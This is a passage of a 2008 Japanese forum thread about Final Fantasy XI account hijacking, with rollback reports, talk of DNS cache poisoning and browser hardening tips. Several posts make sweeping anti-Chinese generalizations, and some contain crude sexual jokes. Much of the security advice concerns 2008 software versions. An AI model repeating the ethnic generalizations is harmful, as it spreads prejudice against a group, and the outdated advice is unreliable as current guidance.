762 名前:既にその名前は使われています:2008/08/26(火) 22:46:40 ID:JBUNLs7A
>>760
赤色のパンティ履いていないとやばいかも

763 名前:既にその名前は使われています:2008/08/26(火) 22:47:07 ID:+HmJ2BKr
IEもfirefoxも最新?
GOMとか古いflash使ってるし
secunia先生がokって言ってるならokだけど

764 名前:既にその名前は使われています:2008/08/26(火) 22:58:30 ID:7n1RFDk7
ハックされた奴まぁこれでも見て落ち着けよ

http://www.nicovideo.jp/watch/sm4209376

765 名前:既にその名前は使われています:2008/08/26(火) 23:06:44 ID:I5XEkids
誰かハック巻き戻しスレ立ててくれ

766 名前:既にその名前は使われています:2008/08/26(火) 23:12:16 ID:JBUNLs7A
>>765
パンティUPしたらビンビンに起ててやる

767 名前:既にその名前は使われています:2008/08/26(火) 23:23:43 ID:XjbJQg0a
【またか】木曜洋画劇場「コマンドー」 9月18日(木)放送
http://namidame.2ch.net/test/read.cgi/news/1219582976/

768 名前:既にその名前は使われています:2008/08/26(火) 23:53:21 ID:v/p9stw+
●● FF11垢ハック巻き戻し状況報告スレ3 ●●

ここはRMT業者によって垢ハックされた人がスクエニからの巻き戻しを報告するスレです。
巻き戻し期間や、巻き戻し申請に必要なものなど、経験者の報告等を書き込んできださい。

前スレ ●● FF11垢ハック巻き戻し状況報告スレ2 ●●
    http://changi.2ch.net/test/read.cgi/ogame/1218868358/

垢ハックの被害報告・危険サイト等の告知・垢ハック防御の対策などについては
●● RMT業者の垢ハックが多発している件37 ●●
http://changi.2ch.net/test/read.cgi/ogame/1219176652/
↑こちらに書き込み願います。
※このスレのテンプレを作られる方は「●● RMT業者の垢ハックが多発している件 ●●」の
 現行スレURLを調べた上で、上記スレナンバーとURLの書き換えをお願いします。

■このスレの目的
垢ハック後の巻き戻し期間や巻き戻されたあとの状況を報告し、巻き戻し待ちの人に情報を提供する。
☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」「巻き戻しに時間かかりすぎだバカヤロー」
 等の議論も、この場で行ってください。

769 名前:既にその名前は使われています:2008/08/26(火) 23:54:55 ID:v/p9stw+
とりあえずテンプレだけ出しておきます
たぶんわたしは立てられません
保持スレが300になったため、かなり維持は大変だと思います

770 名前:既にその名前は使われています:2008/08/27(水) 00:26:33 ID:MO7pbBRQ
おやすみ前のあげ。

771 名前:既にその名前は使われています:2008/08/27(水) 00:32:00 ID:Vb9jFeiw
サイトのアクセス解析にこんなのがあったらヤバスw
sz.gd.dynamic.163data.com.cn
xw.sh.dynamic.163data.com.cn
sz.gd.dynamic.163data.com.cn
cd.sc.dynamic.163data.com.cn
ly.fj.dynamic.163data.com.cn
hz.zj.dynamic.163data.com.cn
fz.fj.dynamic.163data.com.cn


772 名前:既にその名前は使われています:2008/08/27(水) 00:38:58 ID:Vb9jFeiw
>>754
>・ギルやアイテムの現金による売買に関与していた
>7月第5週 約20件  ・・(実質4日)
>8月第1週 約20件  ・・(実質3日)
>8月第3週 約200件  ・・(実質14日)
>8月第4週 約150件  ・・(実質7日)
たしかに今週がヤバイ気がする。

773 名前:既にその名前は使われています:2008/08/27(水) 00:49:10 ID:vRmqhTkG
>>771
>サイトのアクセス解析にこんなのがあったらヤバスw
>sz.gd.dynamic.163data.com.cn
>xw.sh.dynamic.163data.com.cn
>sz.gd.dynamic.163data.com.cn
>cd.sc.dynamic.163data.com.cn
>ly.fj.dynamic.163data.com.cn
>hz.zj.dynamic.163data.com.cn
>fz.fj.dynamic.163data.com.cn

●●.sh.dynamic.163data.com.cnや
xw.sh.dynamic.163data.com.cnやその他dynamic.163data.com.cnがあるよ

774 名前:既にその名前は使われています:2008/08/27(水) 01:42:11 ID:NSdFb3fg
>>758
FFと全く関係ないところでもハックされるよ。
相当古いアヌメ二次サイトやってる友達経由でアボンした俺が言っておく。

775 名前:既にその名前は使われています:2008/08/27(水) 02:26:30 ID:kxIs0fp0
無差別アカハックの猛威は勢い留まる事を知らず
現在進行形。
まだ何ともないし^^と油断してると
ある日突然順番がまわってくるわけだ。

776 名前:既にその名前は使われています:2008/08/27(水) 03:04:34 ID:q2ZU/yCE
さっきハックされておとさた;こまtった;;


777 名前:既にその名前は使われています:2008/08/27(水) 03:08:13 ID:636X/6Kh
>>771
ブログやってたんだが半年前?はdynamic.163dataシリーズからのアクセス多かったなぁ。
そこらへんかたっぱしから拒否にしたらココ数ヶ月は業者のコメ無くなったわ。
というより、改竄できるようになったからブログにコメする必要が無くなっただけって感じなのかね。


778 名前:既にその名前は使われています:2008/08/27(水) 03:11:55 ID:q2ZU/yCE
Kingsoftってのでウィルスさがさしてるが、、

779 名前:既にその名前は使われています:2008/08/27(水) 03:16:12 ID:1ij6JgU4
中国製のクソソフトですが?w

780 名前:既にその名前は使われています:2008/08/27(水) 03:20:04 ID:mIrqt1Wn
>>776の日本語が不自然なのは何故だwww
こいつ被害者装った業者じゃねーの?

781 名前:既にその名前は使われています:2008/08/27(水) 03:21:02 ID:636X/6Kh
このスレ見てるやつならカスペさんとか使いそうだけどな
また何も対策してなくてハックされてからこのスレ思い出して「ハックされた;」か


782 名前:既にその名前は使われています:2008/08/27(水) 03:24:49 ID:q2ZU/yCE
インしてるときに他からアクセスされたとかで落とされましたよ

783 名前:既にその名前は使われています:2008/08/27(水) 03:51:57 ID:kxIs0fp0
>2のテンプレにそって詳細書くとレスしやすいらしい。

784 名前:既にその名前は使われています:2008/08/27(水) 05:20:17 ID:GWkHJhKK
リカバリCDが見つからないのでクリーンインストールできないお;;

785 名前:既にその名前は使われています:2008/08/27(水) 05:27:33 ID:vAfI7aCY
>>784
アフガニスタンに行けば?

786 名前:既にその名前は使われています:2008/08/27(水) 06:57:34 ID:FOuKiA8I
>>784
窓からPC投げればきっとなおるよ!なおるよ!

どうせ親のクレカつかって遊んでたんだろ。
素直に親に土下座してパソコン業者呼びなさい。

787 名前:既にその名前は使われています:2008/08/27(水) 07:04:03 ID:Tt9NQFKf
なんかニュースで、DNSに致命的な欠陥とかなんとか言ってたが…
終わり際で聞いたのでちょっとわからなかった
正式なアドレス打ち込んでも、全く別のアドレスに飛ばされるとか言ってた

788 名前:既にその名前は使われています:2008/08/27(水) 07:08:40 ID:fp2AoVz5
>>787
このスレでもその話以前に出たと思うが・・・
それとは別の話?

789 名前:既にその名前は使われています:2008/08/27(水) 07:10:16 ID:vAfI7aCY
>>787
トラック協会のデモが原因らしい
ママチャリにもサーチャージ導入しろとな

790 名前:既にその名前は使われています:2008/08/27(水) 07:10:19 ID:zg11Ux/h
>>787
DNSポイゾニングなら、昔からある脆弱性で根本的にはなくならない。
最近話題になったのは、攻撃用に使用する値が予測しやすいというもので、パッチはでてる。

日本の管理団体であるJPNICも日経の記事に対して、説明をだしている。
http://www.nic.ad.jp/ja/topics/2008/20080822-01.html

791 名前:既にその名前は使われています:2008/08/27(水) 07:11:05 ID:zRs0wQIc
>>787
NHKのニュースか?
DNSサーバに欠陥があるってのが海外で発表されたっての
いくつか前のこのスレでも言ってたやつだな
基本的に一般ユーザーはDNSサーバにゃ介入できねーからなぁ

792 名前:既にその名前は使われています:2008/08/27(水) 07:18:41 ID:zRs0wQIc
ttps://www.dns-oarc.net/oarc/services/dnsentropy

おれもネットワーク知識あるわけじゃないし詳しくは分からんが
↑のDNSチェッカーで矢印がメーターの赤いほうに傾いてPOORが出たら対策されてないってことらしい

DNSサーバってプロバイダに依存するんだっけ?ブラウザで代替DNSサーバを設定してなければ
POORだったら代替DNSサーバ設定すんのがいいのかね

793 名前:既にその名前は使われています:2008/08/27(水) 07:23:34 ID:ryWEhcMH
それでOK

後、大体のプロバイダでは既に対策されてるかと。
前にかなり話題になったから。

794 名前:既にその名前は使われています:2008/08/27(水) 07:31:25 ID:MO7pbBRQ
おはようのあげ。

795 名前:既にその名前は使われています:2008/08/27(水) 07:41:43 ID:CZjyW67l
その番組は見ていないけれど、DNS キャッシュ ポイゾニング だからね。 

GREATと>>792さんの貼ったサイトででても、
自分の家のDNSキャッシュ機能のあるルータのチェックだけになる。
下位DNSキャッシュ機能付き機材が対策してても上位がだめならもう無理。

ttp://www.jpcert.or.jp/at/2008/at080014.txt

796 名前:既にその名前は使われています:2008/08/27(水) 08:33:30 ID:TCmLDuCY
なんか知らんがIE7のセキュリティ更新プログラムが降ってきたぞ
KB938127

797 名前:既にその名前は使われています:2008/08/27(水) 08:37:40 ID:HK8IlRMn
Firefox2系最新のままにしてたら、更新通知が3系にしろと言い出した
アドオン対応がβとかあるからどうするか・・・

798 名前:既にその名前は使われています:2008/08/27(水) 09:15:46 ID:+2Qloul4
>>795
>>792は上位DNSをチェックするわけだが…仕組み解ってる?
上位がGREATでも下位がだめならって話なら一応合ってるが
>>797
早めにFirefox 3の評価をしてさっさと移行しる

799 名前:既にその名前は使われています:2008/08/27(水) 09:19:49 ID:VUkkfL5y
>>583
PCとPS2の両方垢ハックされたって?
PS2でも垢ハックされるのか?訂正しろよ?釣りだよな?
どうせ2垢ともPCでログインしたことあるんだよな?
PS2で復帰した後がない私をあまり怖がらせないでください

800 名前:798:2008/08/27(水) 09:28:55 ID:+2Qloul4
ちと書き方がまずかった
「上位がだめなら極めて危険だし、上位がGREATでも下位がだめなら危険度は高い」だな

>>792でGREATが出なかった場合はOpenDNSの利用が推奨されてる、詳しくはググれ

801 名前:既にその名前は使われています:2008/08/27(水) 10:32:14 ID:sf6ZJplt
>>753
RMT自体が違法じゃないから国内サイトは無理だろうなぁ...
マツブシとかが明確に不正アクセスで得られたギルだと把握して買っててその証拠が押さえられれば別だけど無理だろうなぁ...

802 名前:既にその名前は使われています:2008/08/27(水) 10:32:58 ID:fXj8p1iJ
火狐ってそんな安全なもんなの?

803 名前:既にその名前は使われています:2008/08/27(水) 10:36:06 ID:Vlgl+nOX
火狐のNoscriptを狙い撃ちにしたワームが開発されない限り比較的安全じゃね

804 名前:既にその名前は使われています:2008/08/27(水) 10:48:20 ID:3pw0JGDA
PS2でハックされたとかいうやつは即効消えるからネタだろ

805 名前:既にその名前は使われています:2008/08/27(水) 10:59:34 ID:KoT99t4M
>>796
MS07-050 Vector Markup Language の脆弱性により、リモートでコードが実行される
去年の修正プログラムだけど、Windows XP SP3 + IE7の環境も適用対象になることが
発表されて、修正プログラムが差し替えられたみたい。

806 名前:既にその名前は使われています:2008/08/27(水) 11:22:03 ID:T3iYdpuI
垢ハックウィルスは見つからなかったが山田先生がいた俺おわた\(^o^)/

807 名前:既にその名前は使われています:2008/08/27(水) 11:26:45 ID:hLOOShoj
>>802
基本大多数の人が使ってるIEが狙われるので、火狐は防衛プラグインなどもあるのでそれよりは安全
だが完璧ではない、と言うか完璧なブラウザなどない
火狐入れたからおk!って勘違いしちゃう人もいるからなぁ

808 名前:既にその名前は使われています:2008/08/27(水) 12:00:05 ID:i4dKI7QP
今流行りのFlashPlayerの脆弱性はそもそもブラウザ関係ないしね。

809 名前:既にその名前は使われています:2008/08/27(水) 12:25:21 ID:ZrYVAdg6
復旧に後一ヶ月ぐらい掛かりそうだから課金停止したいけどPOLにログインすると強制GMチャットに・・・どうすれば・・・

810 名前:既にその名前は使われています:2008/08/27(水) 12:25:51 ID:MoBg4ShF
お気に入りからネ実に繋がらなくなったのだが
・・・これ どういうことかな??


811 名前:既にその名前は使われています:2008/08/27(水) 12:26:15 ID:2Bi0euPB
一時流行ったIFRAMEのチッコイ奴とかは、Firefoxの方が防ぎやすいんじゃない?
IEにIFRAME無効にするオプションとか付いてるんだっけ?

812 名前:既にその名前は使われています:2008/08/27(水) 12:29:31 ID:OQOXslT0
>>811
インターネットオプション→セキュリティ→レベルのカスタマイズ に、
・IFRAMEのプログラムとファイルの起動
という項目があるが、これが該当するものかどうかは不明

813 名前:既にその名前は使われています:2008/08/27(水) 12:59:10 ID:yNTUu+xA
>>808
厳密にはブラウザ関係ないんじゃなくて両方に対応してるだけ
攻撃者はFirefoxも狙えるなら狙ってくるということだ

814 名前:既にその名前は使われています:2008/08/27(水) 12:59:24 ID:goCsFlX+
IEでJavaスクリプトも実行前に確認できるが…
「スクリプトは通常、安全です」とか言われれば何も考えずポチる
Firefox+NoScript+Flashblockに慣れるとIEは怖くて使えない

>>810
IEでここ見てるヤツは居ないから返答不可

815 名前:既にその名前は使われています:2008/08/27(水) 13:01:47 ID:MoBg4ShF
>>814
返事ありがと;;
IE・・・??おきにいりの事かな??

816 名前:既にその名前は使われています:2008/08/27(水) 13:03:29 ID:/h6thvaP
>>815
お前鞄鯖かよw

817 名前:既にその名前は使われています:2008/08/27(水) 13:03:45 ID:kJ3tvivC
FirefoxにNoScript入れると自動的にIFRAMEもブロックしてくれる
もんだと思ってた。
FireFoxでIFRAMEとフラッシュを見ないように設定する方法ってある?
設定とか色々探したんだけど見当たらない

818 名前:既にその名前は使われています:2008/08/27(水) 13:08:06 ID:yNTUu+xA
>>817
NoScriptの設定開けよ…

819 名前:既にその名前は使われています:2008/08/27(水) 13:08:46 ID:1gtsB9sS
>>817
NoScriptの設定を落ち着いてしっかり見てみると幸せになれるカーモメ。
ツール>アドオン>NoScript設定ボタン>ちゃんと嫁。

820 名前:既にその名前は使われています:2008/08/27(水) 13:34:17 ID:rpNGt0Yo
FF WIKI改竄されてる?

821 名前:既にその名前は使われています:2008/08/27(水) 13:42:45 ID:yNTUu+xA
どのFF WIKIだよ

822 名前:既にその名前は使われています:2008/08/27(水) 13:44:32 ID:rpNGt0Yo
FINAL FANTASY XI Wiki

823 名前:既にその名前は使われています:2008/08/27(水) 13:45:50 ID:UqFDMqdq
>>822
どの部分?

824 名前:既にその名前は使われています:2008/08/27(水) 13:46:30 ID:vAfI7aCY
FINAL TINPO XI Wiki
に改竄されてるね

825 名前:既にその名前は使われています:2008/08/27(水) 14:00:36 ID:iKE0TbC7
ただの残暑厨だな
さっさと学校始まれよ

826 名前:既にその名前は使われています:2008/08/27(水) 14:15:57 ID:rpNGt0Yo
>>823
FINAL FANTASY XI Wiki
で検索してみてーんで、

827 名前:既にその名前は使われています:2008/08/27(水) 15:09:13 ID:gG/+hmvC
ビビらせんじゃねぇw

828 名前:既にその名前は使われています:2008/08/27(水) 15:10:55 ID:xxo1Kj9N
wikiでパス抜かれた;;

829 名前:既にその名前は使われています:2008/08/27(水) 15:35:49 ID:PIo3yC8m
>>828
どこのwikiです?・・・w

FINAL FANTASY XI Wikiのページにはスクリプトは使われていないようですから
たとえばFirefoxがスクリプト遮断を通知したら注意ですね
リンク先までは見ていないので、リンクが書き換えられているかどうかは
わかりませんけど、基本的にリンクを飛ぶときはステータスを見てから
ぽちっとすると思いますので、飛ぶときに注意していれば大丈夫でしょう

830 名前:既にその名前は使われています:2008/08/27(水) 15:38:02 ID:vAfI7aCY
>>829
全国ソープ梯子Wiki

831 名前:既にその名前は使われています:2008/08/27(水) 15:40:24 ID:KoT99t4M
エスパーしてみる。

FINAL FANTASY XI Wikiのトップページにあるネ実とネトゲ質問板への
リンクがlive25サーバへのデッドリンクになっている。これらのリンクを
たどっても2chにこられないので改ざんを疑った。
ということかな?

なお、リンクの修正は依頼ずみ。

832 名前:既にその名前は使われています:2008/08/27(水) 15:46:38 ID:NsxdJoXu
巻き戻し報告
7/16 ハッキング 即日凍結&新規パスワードゲット
7/25 書類証明付郵送
7/28 告知なしでゲーム中落とされる 翌日サポセンの担当者及び上役を叱りあげる
8/27 データ復元完了メール届く
以上であります。

833 名前:既にその名前は使われています:2008/08/27(水) 16:17:00 ID:UqFDMqdq
>>832
凍結したのにゲームとな!?

ところで書類普通に速達で送っちゃったけどよかったのかな?
あときちんと受理されたかチャットで確認したほうがいいのかな?

834 名前:既にその名前は使われています:2008/08/27(水) 16:19:55 ID:JjLZLT2T
ID:rpNGt0Yoにエスパー 第2弾
検索からFINAL FANTASY XI Wikiへいくと 強制転送がある。
これで不安になったんじゃないかな?

ふつうの pukiwikiはページがほにゃらら.phpだけど そこはほにゃらら.htmlでしょ?
FINAL FANTASY XI Wikiは 負荷軽減のためHTMLで出力してる。
トップページも本来のindex.phpではなく別のほにゃらら.htmlになってる。
そのため転送をかけて URLトップをhtmlのほうのトップページに飛ばしてる。

のーぷろぶれむ のーぷろぶれむだ ろっく

835 名前:既にその名前は使われています:2008/08/27(水) 16:27:21 ID:NsxdJoXu
えとその時業者が操作してたので 一時凍結してサポセンから新規パスワードもらって クリーンインストールしてから遊んでました。
で、復元の進捗等は、把握できないって言ってました。
書類が届いたかどうかは、アカウント凍結=書類到着そしてデータ復元作業開始なのですぐわかると思います。

836 名前:既にその名前は使われています:2008/08/27(水) 16:38:08 ID:vAfI7aCY
アカウント救済は1500円の有料でいいと思います

837 名前:既にその名前は使われています:2008/08/27(水) 16:54:07 ID:UqFDMqdq
>>835
ああ、そういう対応もあるんだ、、
俺の場合ハッキングにきがついてすぐ、垢復旧とデータ復旧申請したから
すぐ凍結されてて、書類受理されたのかわからんのだ
明日朝にでもGMチャットしてみるわ

838 名前:既にその名前は使われています:2008/08/27(水) 17:11:35 ID:avz803tH
結局WIKI改竄はないっぽいの?
ねね!どーなのよーーーーーー

839 名前:既にその名前は使われています:2008/08/27(水) 17:32:03 ID:i4dKI7QP
ドッカン
          ドッカン
                  ☆ゴガギーン
        .______
.        |    |    |
     ∩∩  |     |    |  ∩∩
     | | | |  |    |    |  | | | |  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    (  ,,)  |     |    | (・x・ )<おらっ!出てこい、ID:rpNGt0Yo
   /  つ━━"....ロ|ロ   . | l   |U \___________
 〜(  /   |    |    |⊂_ |〜
   し'∪  └──┴──┘  ∪

840 名前:既にその名前は使われています:2008/08/27(水) 17:44:01 ID:GY9KQiAn
なんて凶悪なみっ○ぃーだ

841 名前:既にその名前は使われています:2008/08/27(水) 17:54:56 ID:g2MjpO1W
ミッキィー

842 名前:既にその名前は使われています:2008/08/27(水) 17:57:11 ID:gG/+hmvC
逃げてー!そこから超逃げてーー!

843 名前:既にその名前は使われています:2008/08/27(水) 18:10:03 ID:l3t5XwJ4
合成板に変なアドレスがマルチされていた
ff11omise■dokkoisho■com/mise■html
ぐぐるに入れたら
もしかして: http://ff11omise■dokkoisho■com/misc■html
というものが出てきたが、これは何がしたかったんだろう?

844 名前:既にその名前は使われています:2008/08/27(水) 18:28:19 ID:EJ38Sby1
とりあえず、Aguseでは問題なさげ(鯖は東京)だが、
踏む場合は自己責任で。

845 名前:既にその名前は使われています:2008/08/27(水) 18:36:10 ID:V/V9BzYQ
消えてるんだけど気のせい?
ウィルス置き場作ろうとして排除されたのかな?

846 名前:既にその名前は使われています:2008/08/27(水) 18:36:35 ID:g2Iuy4ai
そっこー

「一太郎」の脆弱性を突くトロイの木馬が出回る
ttp://internet.watch.impress.co.jp/cda/news/2008/08/27/20668.html

847 名前:既にその名前は使われています:2008/08/27(水) 18:42:45 ID:EJ38Sby1
>>843
ちょっと合成板見てきたけど、なぜか骨スレには無かったなw

848 名前:既にその名前は使われています:2008/08/27(水) 18:47:23 ID:JjLZLT2T
dokkoisho■comは 忍者のサブドメだから国内になるのは当然。
indexページをおいてないけど中身はまだあるね。
あのマルチ加減だと だれかからいやがらせうけてるのか
まともなサイトにみせかけて あとからなんか仕込む予定なのか現状じゃ判断しかねる。


849 名前:既にその名前は使われています:2008/08/27(水) 19:08:55 ID:i4dKI7QP
アフィじゃね?

850 名前:既にその名前は使われています:2008/08/27(水) 19:32:36 ID:IdovjsY9
あげあげ。

>>834の「のーぷろぶれむだ ろっく」ってレヴィだっけ?w

851 名前:既にその名前は使われています:2008/08/27(水) 20:07:44 ID:PIo3yC8m
>>838
リンク部分は確認してないのでわかりませんが、いまのところ(←ここ大事)
スクリプトは確認されないのでIEで見ても大丈夫です
できればネットの閲覧にはFirefox+NoScriptでIFRAMEを不許可にして
回られることをおすすめします

852 名前:既にその名前は使われています:2008/08/27(水) 20:35:53 ID:af8hgJon
http://www.opendns.com/support/adult/
にも投稿してやろうぜ


853 名前:既にその名前は使われています:2008/08/27(水) 21:10:46 ID:i4dKI7QP
ほしゅ

854 名前:既にその名前は使われています:2008/08/27(水) 22:26:24 ID:sQfrwPzB
ぽしゅ

855 名前:既にその名前は使われています:2008/08/27(水) 22:48:10 ID:vAfI7aCY
ジャストシステムのワーブロソフト「一太郎」に見つかった未成年の脆弱性を突くロイ・スチュアートの三角木馬が出回っているとして、米McAfeeや米Symantecが注意を促している。

856 名前:既にその名前は使われています:2008/08/27(水) 23:54:45 ID:sQfrwPzB


857 名前:既にその名前は使われています:2008/08/28(木) 00:04:01 ID:ccA1uIxc
中国へのPC出荷禁止しる

858 名前:既にその名前は使われています:2008/08/28(木) 00:05:46 ID:pA+c67/0
>>857
生産現場が中国だと知っての狼藉か?w

859 名前:既にその名前は使われています:2008/08/28(木) 00:08:25 ID:T1XvPjh0
友人に薦められて、騙されたと思ってブログにフリーチベット (Free Tibet)
って入れておいたら、大陸からのアクセス履歴がぴたりと途絶えた。
どうせ別ルートから来てはいるんだろうけど、こぇー国だなぁ。

860 名前:既にその名前は使われています:2008/08/28(木) 00:20:30 ID:sinHjR5u
一般中華はアクセスできなくなるが
中華精鋭部隊の攻撃目標になるから諸刃の剣だな

861 名前:既にその名前は使われています:2008/08/28(木) 00:37:36 ID:5DISK0B4
おやすみ前のあげ。

862 名前:既にその名前は使われています:2008/08/28(木) 02:14:31 ID:oiWQ1skK
251緊急上げ

863 名前:既にその名前は使われています:2008/08/28(木) 02:17:17 ID:T7gKRLpS
それなら支援age

864 名前:既にその名前は使われています:2008/08/28(木) 02:19:57 ID:oiWQ1skK
★夜更かし中の皆様へ
スレ番が200を越えたら上げ保守をお願いします
そして俺は寝る。後は頼んだ

865 名前:既にその名前は使われています:2008/08/28(木) 02:24:39 ID:T7gKRLpS
今244だぞwwwww
あげ

866 名前:既にその名前は使われています:2008/08/28(木) 03:02:13 ID:2TNJXCXl
最近の報告見てるとやっぱりハックから完全復活まで90日前後ですね上げ

867 名前:既にその名前は使われています:2008/08/28(木) 03:15:00 ID:lxjIqVXa
>>866
上がってないっすよ上げ!

868 名前:既にその名前は使われています:2008/08/28(木) 03:21:24 ID:28Qrr1W+
こうしている間にも大陸では新種が増産されているんだろうな。
気を引き締めていこうぜあげage

869 名前:既にその名前は使われています:2008/08/28(木) 03:24:38 ID:qslZHFq2
おれのまんこも締りいいよw age

870 名前:警察に通報すれば業者は逮捕されます:2008/08/28(木) 03:34:55 ID:/gINGCAs
l■電気通信事業法違反:ネットで違法中継 容疑の男書類送検−−山口・下松署

インターネットでオンラインゲームを違法に中継したとして、山口県警下松署は21日、東京都江戸川区でパソコン修理などを営む
中国人の男(30)を電気通信事業法違反(無届け事業)の疑いで 山口地検周南支部に書類送検した。

調べでは、男は昨年8月から今年6月まで、都内の自宅にネット接続を 代行するプロキシサーバ150台を設置し、
中国などの利用者にゲームを中継した疑い。アクセス数は1102万回に及び、利用者から約172万円 の報酬を受け取っていたらしい。

下松市内の会社員から「ゲームのIDを盗まれて仮想通貨をとられた」 と不正アクセスの相談があり、接続元の男を特定した。
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
同様の摘発は今年に入って全国で2件目。オンラインゲームを運営する国内の業者は、不正アクセスの多い中国からの接続を遮断している。

ソース:毎日新聞 2008年8月22日 西部朝刊
http://mainichi.jp/seibu/shakai/news/20080822ddp012040017000c.htm


871 名前:既にその名前は使われています:2008/08/28(木) 03:36:35 ID:/gINGCAs
アドレス少し間違ってた

正しくは
http://mainichi.jp/seibu/shakai/news/20080822ddp012040017000c.htm

まあ既出だけどねl

872 名前:既にその名前は使われています:2008/08/28(木) 03:37:40 ID:/gINGCAs
修正してなかったorz

http://mainichi.jp/seibu/shakai/news/20080822ddp012040017000c.html

873 名前:既にその名前は使われています:2008/08/28(木) 04:27:18 ID:6OQI5KdU
なにあらしてんだw

874 名前:既にその名前は使われています:2008/08/28(木) 08:05:56 ID:8N7bK+Zm
ほしゅ

875 名前:既にその名前は使われています:2008/08/28(木) 08:06:08 ID:uQNd/rEL
おはよ〜の保守

876 名前:既にその名前は使われています:2008/08/28(木) 08:06:38 ID:G+dw7f2Z
あげ

877 名前:既にその名前は使われています:2008/08/28(木) 09:35:37 ID:crXpVfud
まげ

878 名前:既にその名前は使われています:2008/08/28(木) 09:57:54 ID:OqQj3sQx
age

879 名前:既にその名前は使われています:2008/08/28(木) 10:45:52 ID:+EKnzeuT
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    削除しよう!
WindowsUpdate   常に最新にしよう!

マカフィー2006〜2008はPG2入れても問題ないぞ!というか入れろw

880 名前:既にその名前は使われています:2008/08/28(木) 11:09:56 ID:pg0824hE
秋ですな

881 名前:既にその名前は使われています:2008/08/28(木) 12:01:22 ID:uPpRFHAo
宇宙ステーション内のパソコンにウイルス侵入
http://www.yomiuri.co.jp/science/news/20080828-OYT1T00284.htm?from=main3
英BBCニュース(電子版)によると、このワームは10種類のオンラインゲームのパスワードなどを盗むもので、
ISSの運用には危険がない。感染は今回が初めてではないが、ISS内のパソコンの多くにはウイルス防止ソフトが導入されていなかったという。

こんなとこにまでw

882 名前:既にその名前は使われています:2008/08/28(木) 12:02:28 ID:yLvi59xS
>>881
やべぇ ワロタ

でもここまで大事になってくると業者ヤバいんじゃね?
こっちは望むところだが。

883 名前:既にその名前は使われています:2008/08/28(木) 12:04:59 ID:JoT4AyG5
ここまで大事になればきっとつぶしてくれるに違いない!

884 名前:既にその名前は使われています:2008/08/28(木) 12:05:03 ID:qWWPL3XG
>>881
これで国際問題化して中国叩きがはじまればいいなぁ

885 名前:既にその名前は使われています:2008/08/28(木) 12:06:52 ID:F2F13qJe
国が率先してやってるならそうなるだろうけど・・・

886 名前:既にその名前は使われています:2008/08/28(木) 12:09:15 ID:JFS3h+AN
馬鹿!ここで業者を叩くんじゃなくて、無防備だった宇宙ステーションを叩くのが俺等でしょうに。

宇宙ステーション乙 イギリス国家乙

887 名前:既にその名前は使われています:2008/08/28(木) 12:09:17 ID:qWWPL3XG
宇宙ステーションって民営?

888 名前:既にその名前は使われています:2008/08/28(木) 12:11:35 ID:krmRDGHT
イギリス政府にこのスレのテンプレでも送るか^^^^^。

889 名前:既にその名前は使われています:2008/08/28(木) 12:14:51 ID:PjU9Lf+c
>>870
これあれだな・・・
廃品回収みたくPCやらオーディオやらを回収している連中
きてもらったら日本語が怪しい人間が来るのは有名な話
背後関係をたどってもっと調べると893にたどりつくぞ

890 名前:既にその名前は使われています:2008/08/28(木) 12:17:31 ID:MRnqWZEN
>>881
やばい・・・仕事中に読んで吹き出したw

891 名前:既にその名前は使われています:2008/08/28(木) 12:21:06 ID:qWWPL3XG
これが国際問題化すれば・・・

諸国<中国はハッカー大国。なんとかしる
中国<証拠もないのにきめつけないでほしいアル!
中国当局<(…こいつらと証拠を消せ…)
中国<証拠はなかったアルヨ。

これで世界は平和になった。

892 名前:既にその名前は使われています:2008/08/28(木) 12:29:23 ID:qWWPL3XG
アメリカ大統領やイギリス首相や中華主席がネトゲしてないかなぁ

893 名前:既にその名前は使われています:2008/08/28(木) 12:50:08 ID:8N7bK+Zm
ttp://www.itmedia.co.jp/enterprise/articles/0808/28/news023.html
>「なぜ宇宙へ持っていく前にウイルスチェックをかけておかなかったのか」とクルーリー氏は疑問を呈している。

これに同意。買ったら最初からウイルス入ってたなんてこともあるし。

894 名前:既にその名前は使われています:2008/08/28(木) 13:11:17 ID:ZGIyuOIn
ほす

895 名前:既にその名前は使われています:2008/08/28(木) 13:14:22 ID:9jg2F3yY
「こちら宇宙ステーション。チャンピオン号。只今、火星に向かって飛行中。地球本部、どーぞ」



896 名前:既にその名前は使われています:2008/08/28(木) 13:16:23 ID:aRaFVIfm
「こちら地球本部コントロールタワー。チャンピオン号へ残念な知らせがある。
諸君のWoWのアカウントがハッキングされた。本部ではただいま原因を解明中。オーバー」

897 名前:既にその名前は使われています:2008/08/28(木) 13:26:38 ID:JoT4AyG5
宇宙でもネトゲwww

898 名前:既にその名前は使われています:2008/08/28(木) 13:45:04 ID:DxPpaF3x
Snakeman Show age

899 名前:既にその名前は使われています:2008/08/28(木) 13:54:17 ID:yLvi59xS
「こちら宇宙ステーション。チャンピオン号。アカウントハッキングとはどういうことだ。
俺のレア装備や金が盗られたのか?説明を求める。」

900 名前:既にその名前は使われています:2008/08/28(木) 15:31:26 ID:BEuYTquw
>>898
ttp://www.nicovideo.jp/watch/sm754104
ttp://www.nicovideo.jp/watch/sm960674

901 名前:既にその名前は使われています:2008/08/28(木) 15:45:53 ID:JqRdfiCZ
保守あげ

902 名前:既にその名前は使われています:2008/08/28(木) 15:47:35 ID:52/+2GAu
>>899
スルーされてらw

903 名前:既にその名前は使われています:2008/08/28(木) 15:52:30 ID:Q86Xka1A
>>902
受付時間外だったんだよ………って、サポートの17時終了ってきつくねぇか?

904 名前:既にその名前は使われています:2008/08/28(木) 15:53:30 ID:TwsqKDlf
いまさらなにをw

905 名前:既にその名前は使われています:2008/08/28(木) 15:53:46 ID:52/+2GAu
あいつら仕事する気ねーからな

906 名前:既にその名前は使われています:2008/08/28(木) 15:57:20 ID:h4/z9Cta
有料でいいからさ、凍結番号?みたいな物を家に葉書で送ってもらってだな
電話で24時間自動対応で、自分で番号打ち込んで凍結できるようにして欲しい

907 名前:既にその名前は使われています:2008/08/28(木) 16:01:40 ID:A74hi8Al
面倒な書類手続きとか無くても、それで即確認して、巻き戻し作業してもらえたりすると便利だな
ほんと、■eの思う壺かも知れんが、有料で良いから何か保険みたいなのが欲しいよ・・・



908 名前:既にその名前は使われています:2008/08/28(木) 16:07:00 ID:M9byqZlM
XREAまた改竄被害があったみたいだな。
今度はSB利用で。
